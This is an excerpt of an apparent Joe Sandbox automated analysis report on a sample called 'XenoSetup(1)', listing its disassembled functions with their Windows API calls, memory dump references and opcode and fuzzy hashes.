                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocAllocate_free
                                                                                      • String ID:
                                                                                      • API String ID: 2447670028-0
                                                                                      • Opcode ID: c2592ec2b84f2662fdddc56b9a9effbf502ac4ad1ac08c85b550082b2243dfea
                                                                                      • Instruction ID: b4af60604834dc3c8f8029842b2ba0d1e9c97ca66f3f8d4ec68aedf193bc9d39
                                                                                      • Opcode Fuzzy Hash: c2592ec2b84f2662fdddc56b9a9effbf502ac4ad1ac08c85b550082b2243dfea
                                                                                      • Instruction Fuzzy Hash: B6F0C832E01146A6FB232A295C04BAF3B98BF91770F14C157E9D8661D0DF759D0081A1
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(?,?), ref: 00FF10AB
                                                                                      • GetProcessAffinityMask.KERNEL32(00000000), ref: 00FF10B2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$AffinityCurrentMask
                                                                                      • String ID:
                                                                                      • API String ID: 1231390398-0
                                                                                      • Opcode ID: 128d576bd65740929a7a0b54440720979554ce0c20401e01d07bcfdca372c818
                                                                                      • Instruction ID: bffc923e2a90b0197de6462bce6775fdf86c24700d3037d5698272a8dcc7a4aa
                                                                                      • Opcode Fuzzy Hash: 128d576bd65740929a7a0b54440720979554ce0c20401e01d07bcfdca372c818
                                                                                      • Instruction Fuzzy Hash: 46E09A32F0024DE7CF2E8AA498159BB72EDFE442643208179E603E7101FD38ED415BA0
                                                                                      APIs
                                                                                      • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00FEA325,?,?,?,00FEA175,?,00000001,00000000,?,?), ref: 00FEA501
                                                                                        • Part of subcall function 00FEBB03: _wcslen.LIBCMT ref: 00FEBB27
                                                                                      • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00FEA325,?,?,?,00FEA175,?,00000001,00000000,?,?), ref: 00FEA532
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesFile$_wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 2673547680-0
                                                                                      • Opcode ID: 684d5a7489baa49e1f02a5b26ee8d4e21ed82580d485384aa20f434a012cae5c
                                                                                      • Instruction ID: 51d9412ed991e4d1c79b4a78d1a21c61624fbe16ec64dfe8d6333c1bc05faab6
                                                                                      • Opcode Fuzzy Hash: 684d5a7489baa49e1f02a5b26ee8d4e21ed82580d485384aa20f434a012cae5c
                                                                                      • Instruction Fuzzy Hash: 6EF0E531200249BBDF025F61DC01FDA3BADBF04395F488050B944D5164DB35DAD8EF10
                                                                                      APIs
                                                                                      • DeleteFileW.KERNELBASE(000000FF,?,?,00FE977F,?,?,00FE95CF,?,?,?,?,?,01012641,000000FF), ref: 00FEA1F1
                                                                                        • Part of subcall function 00FEBB03: _wcslen.LIBCMT ref: 00FEBB27
                                                                                      • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00FE977F,?,?,00FE95CF,?,?,?,?,?,01012641), ref: 00FEA21F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: DeleteFile$_wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 2643169976-0
                                                                                      • Opcode ID: 441f005cd11807d47a94ae2a37b1faaea46eb4378e9907d3bd6b0b0e850be027
                                                                                      • Instruction ID: 387de9731dcd065ef34fb3d0c4a7d6e5fee88a433c1f58df3a3dc88dcfa7145e
                                                                                      • Opcode Fuzzy Hash: 441f005cd11807d47a94ae2a37b1faaea46eb4378e9907d3bd6b0b0e850be027
                                                                                      • Instruction Fuzzy Hash: 9FE0D8315402496BDB115F61DC45FEA379CBF0C7D1F484021BA44E6054EB7ADEC4EB60
                                                                                      APIs
                                                                                      • GdiplusShutdown.GDIPLUS(?,?,?,?,01012641,000000FF), ref: 00FFACB0
                                                                                      • CoUninitialize.COMBASE(?,?,?,?,01012641,000000FF), ref: 00FFACB5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: GdiplusShutdownUninitialize
                                                                                      • String ID:
                                                                                      • API String ID: 3856339756-0
                                                                                      • Opcode ID: e168ce4cfe0fc49dcc6ff0648601cd0e1df3b457d713669e710174deeb2dc7ea
                                                                                      • Instruction ID: c64e1c2fcdb53343139da5a4038b0d124f58c8ce53aaa8fa61fc1e858a858cb2
                                                                                      • Opcode Fuzzy Hash: e168ce4cfe0fc49dcc6ff0648601cd0e1df3b457d713669e710174deeb2dc7ea
                                                                                      • Instruction Fuzzy Hash: A8E06576604650EFC710AF59DC46B45FBA8FB88A20F10426AF456D3764CB786800CB90
                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNELBASE(?,?,?,00FEA23A,?,00FE755C,?,?,?,?), ref: 00FEA254
                                                                                        • Part of subcall function 00FEBB03: _wcslen.LIBCMT ref: 00FEBB27
                                                                                      • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00FEA23A,?,00FE755C,?,?,?,?), ref: 00FEA280
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesFile$_wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 2673547680-0
                                                                                      • Opcode ID: b5afb64fbb51d4916d8465558fe179b4bc981e2c22df7e99df374e9c8a70f214
                                                                                      • Instruction ID: ec47d14167ba6e07f9aa3e2143abd9a47bab1ae7072633eb5fc37e02480e850b
                                                                                      • Opcode Fuzzy Hash: b5afb64fbb51d4916d8465558fe179b4bc981e2c22df7e99df374e9c8a70f214
                                                                                      • Instruction Fuzzy Hash: 2EE092319001689BCF21AB64CC05BD97798AB083F1F0442A1FE84E7194D779DD44DBA0
                                                                                      APIs
                                                                                      • _swprintf.LIBCMT ref: 00FFDEEC
                                                                                        • Part of subcall function 00FE4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FE40A5
                                                                                      • SetDlgItemTextW.USER32(00000065,?), ref: 00FFDF03
                                                                                        • Part of subcall function 00FFB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00FFB579
                                                                                        • Part of subcall function 00FFB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FFB58A
                                                                                        • Part of subcall function 00FFB568: IsDialogMessageW.USER32(00090028,?), ref: 00FFB59E
                                                                                        • Part of subcall function 00FFB568: TranslateMessage.USER32(?), ref: 00FFB5AC
                                                                                        • Part of subcall function 00FFB568: DispatchMessageW.USER32(?), ref: 00FFB5B6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                      • String ID:
                                                                                      • API String ID: 2718869927-0
                                                                                      • Opcode ID: 95b90e7bf5a97d7a737bfe9b3869085122c34b9289b7f28831bf1d3fdc99390f
                                                                                      • Instruction ID: 04dce551dc37dbe2611ce4a05b34bd1e6bf1f71a02fa95ff02ed3f762cf8dab1
                                                                                      • Opcode Fuzzy Hash: 95b90e7bf5a97d7a737bfe9b3869085122c34b9289b7f28831bf1d3fdc99390f
                                                                                      • Instruction Fuzzy Hash: 2EE092B640038827DF22AB61DC06FAE3BAC5B15785F484856B344EA0B2DA7DEA109761
                                                                                      APIs
                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00FF0836
                                                                                      • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00FEF2D8,Crypt32.dll,00000000,00FEF35C,?,?,00FEF33E,?,?,?), ref: 00FF0858
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: DirectoryLibraryLoadSystem
                                                                                      • String ID:
                                                                                      • API String ID: 1175261203-0
                                                                                      • Opcode ID: 100288232c12ee5c19b240b83a77303f2423ef1d0792f2d0922588d6b45e91a2
                                                                                      • Instruction ID: 65bc6dfa093d0c3db9e2fbf312c6b03395bab93751300c5f13d236c7059c6715
                                                                                      • Opcode Fuzzy Hash: 100288232c12ee5c19b240b83a77303f2423ef1d0792f2d0922588d6b45e91a2
                                                                                      • Instruction Fuzzy Hash: D4E012768002586ADB11A6959D05FEA7BACFF097E1F0400657645E2004DA78DA84DBA0
                                                                                      APIs
                                                                                      • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00FFA3DA
                                                                                      • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00FFA3E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: BitmapCreateFromGdipStream
                                                                                      • String ID:
                                                                                      • API String ID: 1918208029-0
                                                                                      • Opcode ID: 421956c65453b944f906e4bb330294c6e5b41799bb90a8f01259e008a929a2f2
                                                                                      • Instruction ID: 8621e1700258584b9e1af2d68236ee73a5e13d5eefac2286b72788bb6011accd
                                                                                      • Opcode Fuzzy Hash: 421956c65453b944f906e4bb330294c6e5b41799bb90a8f01259e008a929a2f2
                                                                                      • Instruction Fuzzy Hash: C3E0EDB190021CEBCB10DF55C9417A9BBE8EF04364F10805AA98A93221E378AE04EB91
                                                                                      APIs
                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 01002BAA
                                                                                      • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 01002BB5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                      • String ID:
                                                                                      • API String ID: 1660781231-0
                                                                                      • Opcode ID: 019d7310ba67f80b70008bbf1b0ac0385120d73c8fca1b0deb53dde7e74173ab
                                                                                      • Instruction ID: dbf09e360da7aee64db936f3434d9233a52b451638e561883b4c7e45bab9d2c4
                                                                                      • Opcode Fuzzy Hash: 019d7310ba67f80b70008bbf1b0ac0385120d73c8fca1b0deb53dde7e74173ab
                                                                                      • Instruction Fuzzy Hash: F5D0A934254A02187C6B2ABA380D9982286BC52BB0FA002DAE4E08D8C1EF959080A212
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemShowWindow
                                                                                      • String ID:
                                                                                      • API String ID: 3351165006-0
                                                                                      • Opcode ID: 1d4eade216c8077a11ea27064ca207ab2d91ec10708046bececaa6ec193f3e3f
                                                                                      • Instruction ID: 94c3c5682e655515063a580644aab0c5074f931fc4fc3034227e24b02dbfbbaf
                                                                                      • Opcode Fuzzy Hash: 1d4eade216c8077a11ea27064ca207ab2d91ec10708046bececaa6ec193f3e3f
                                                                                      • Instruction Fuzzy Hash: DCC012BA05C260BFCB010BB4DD0AC2BBBB8BBA5312F04C908B0E5C0064C23EC010DB11
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: 189bbcde6dea558fadf5b789cbed6133e514ed4ef31151068790a1801bb94f43
                                                                                      • Instruction ID: 2460bae855fcf678aeade7f07433d4a550e95d8b64230fc58fe1161ab59d72fb
                                                                                      • Opcode Fuzzy Hash: 189bbcde6dea558fadf5b789cbed6133e514ed4ef31151068790a1801bb94f43
                                                                                      • Instruction Fuzzy Hash: 3DC1C230E002949FEF24DF2AC884BA97BA5BF55320F1801B9EC45DF286DB359944DB61
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: c5f0b5e07a0c90e9b61dd2aa503048ed031767c9078d19d2adda87cef531cbe6
                                                                                      • Instruction ID: a846d539bc4fa7a742295db9fbb160994c058a997cd5a31daa4346f723f754fc
                                                                                      • Opcode Fuzzy Hash: c5f0b5e07a0c90e9b61dd2aa503048ed031767c9078d19d2adda87cef531cbe6
                                                                                      • Instruction Fuzzy Hash: A671C271500BC49EDB35DB75CC59AE7B7E9AF14300F40096EE2AB87241DA367A48EF11
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00FE8289
                                                                                        • Part of subcall function 00FE13DC: __EH_prolog.LIBCMT ref: 00FE13E1
                                                                                        • Part of subcall function 00FEA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00FEA598
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog$CloseFind
                                                                                      • String ID:
                                                                                      • API String ID: 2506663941-0
                                                                                      • Opcode ID: 6d62adbae2b7c82f814bb71cbac18aa8b3c495ebf7adbcd80df860f93cbe666f
                                                                                      • Instruction ID: 6e18d069dc5bf452563eeea1e671ac2ffa59b2060296cf50e342d60d62215ca6
                                                                                      • Opcode Fuzzy Hash: 6d62adbae2b7c82f814bb71cbac18aa8b3c495ebf7adbcd80df860f93cbe666f
                                                                                      • Instruction Fuzzy Hash: C841C9719446989EDB20EBA2CC55AE9B7B8BF00344F4404EBE18E97093EB745E85EB50
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00FE13E1
                                                                                        • Part of subcall function 00FE5E37: __EH_prolog.LIBCMT ref: 00FE5E3C
                                                                                        • Part of subcall function 00FECE40: __EH_prolog.LIBCMT ref: 00FECE45
                                                                                        • Part of subcall function 00FEB505: __EH_prolog.LIBCMT ref: 00FEB50A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: 432ab172bb61cbc234cb4c1c6892551fa18b19e1741b8a9dc72350c4bc62e8a4
                                                                                      • Instruction ID: 7c02aaa22f3f5b0e37802c17c6b5f9894d2c39fe66cb1156ee2806952f9a0023
                                                                                      • Opcode Fuzzy Hash: 432ab172bb61cbc234cb4c1c6892551fa18b19e1741b8a9dc72350c4bc62e8a4
                                                                                      • Instruction Fuzzy Hash: 8A414DB0905B40DED724CF3A8885AE6FBE5BF19310F544A2EE5FE83291C7356654DB10
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00FE13E1
                                                                                        • Part of subcall function 00FE5E37: __EH_prolog.LIBCMT ref: 00FE5E3C
                                                                                        • Part of subcall function 00FECE40: __EH_prolog.LIBCMT ref: 00FECE45
                                                                                        • Part of subcall function 00FEB505: __EH_prolog.LIBCMT ref: 00FEB50A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: 9e6f4fd339b9a8014f34d747b54c1d3e7f37c7dd704fdc3cb66bb502a9fbc3fd
                                                                                      • Instruction ID: e9ad3bf8b81f13c4a79b992ffed0a370b8ef91a8b0bcfdcf1415a815144bf107
                                                                                      • Opcode Fuzzy Hash: 9e6f4fd339b9a8014f34d747b54c1d3e7f37c7dd704fdc3cb66bb502a9fbc3fd
